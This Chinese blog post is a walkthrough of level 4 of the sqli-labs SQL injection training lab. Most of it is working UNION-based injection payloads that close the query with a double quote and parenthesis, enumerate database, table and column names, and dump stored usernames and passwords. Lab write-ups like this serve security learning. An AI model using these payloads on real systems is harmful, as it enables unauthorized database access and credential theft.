sqli-labs第四关
2022/1/10 19:05:36
本文主要是介绍sqli-labs第四关,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
初始页面:
判断注入:?id=1, ?id=1', 这两个回显都正常,没有问题,再试?id=1"回显界面:
箭头方框的位置是:"1""),别看错,前面的 ' 是和后面的 LIMIT 0,1' 闭合的。
所以我们可以猜想语句然后拼接语句:select * from xxx where id=("$id")
所以我们的payload就是:?id=1")--+
猜解字段数payload:?id=-1") order by $number--+ ($number是数字变量)
当$number是4时:
所以字段数有3个,payload:?id=-1") union select 1,2,3--+
接下来就直接写payload就不截图了,前面的与一到三关一样,payload:
数据库名、用户:?id=-1") union select 1,database(),user()--+
表名:?id=-1") union select 1,2,group_concat(hex(table_name)) from information_schema.tables where table_schema=database()--+ security
列名:?id=-1") union select 1,2,group_concat(hex(column_name)) from information_schema.columns where table_name='users'--+
USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password
查看username和password:?id=-1") union select 1,2,group_concat(username,0x3a,password) from users--+
就酱紫了!
这篇关于sqli-labs第四关的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-082024年常用的情绪识别API
- 2025-01-07如何利用看板工具优化品牌内容创作与审批,确保按时发布?
- 2025-01-07百万架构师第十一课:源码分析:Spring 源码分析:Spring源码分析前篇|JavaGuide
- 2025-01-07质量检测标准严苛,这 6 款办公软件达标了吗?
- 2025-01-07提升品牌活动管理的效率:看板工具助力品牌活动日历的可视化管理
- 2025-01-07宠物商场的精准营销秘籍:揭秘看板软件的力量
- 2025-01-07“30了,资深骑手” | 程序员能有什么好出路?
- 2025-01-07宠物公园的营销秘籍:看板软件如何帮你精准触达目标客户?
- 2025-01-07从任务分解到资源优化:甘特图工具全解析
- 2025-01-07企业升级必备指南:从传统办公软件到SaaS工具的转型攻略